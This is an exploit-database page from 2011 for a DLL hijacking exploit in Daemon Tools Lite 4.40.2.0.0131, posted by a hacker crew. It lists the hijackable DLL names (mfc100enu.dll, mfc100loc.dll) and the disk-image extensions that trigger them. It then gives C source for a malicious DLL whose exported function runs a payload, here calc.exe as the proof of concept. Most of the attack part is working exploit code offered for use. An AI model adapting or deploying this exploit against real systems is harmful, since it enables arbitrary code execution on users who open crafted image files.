Daemon Tools Lite 4.40.2.0.0131 DLL Hijacking Exploit



EKU-ID: 695 CVE: OSVDB-ID:
Author: X-h4ck Published: 2011-07-07 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


# Exploit Title : Daemon Tools Lite 4.40.2.0.0131 DLL Hijacking Exploit
# Software link : http://www.disc-tools.com/download/daemon
# Version       : 4.40.2.0.0131
# Tested on     : Windows 7 Home Premium x86
# Date          : 6/07/2011
# Author        : X-h4ck
# Website       : http://www.pirate.al , @PirateAL Crew , http://theflashcrew.blogspot.com
# Email         : mem001@live.com
# Greetz        : Wulns~ - IllyrianWarrior - Danzel - Ace - M4yh3m - Saldeath - bi0 - Slimshaddy - d3trimentaL - Lekosta - Pretorian - CroSs - Rigon 

# Vulnerable files(.dll) & Vulnerable extensions :
[x] mfc100enu.dll = .mds
[x] mfc100loc.dll = .mds
[x] mfc100loc.dll = .mdf
[x] mfc100enu.dll = .mdx
[x] mfc100loc.dll = .mdx

//calc.exe :

#include "windows.h"
#define DllExport __declspec (dllexport)
 
DllExport void hook_startup() { PirateAL(); }
 
int PirateAL()
{
  WinExec("calc", 0);
  exit(0);
  return 0;
}

# @PirateAL Crew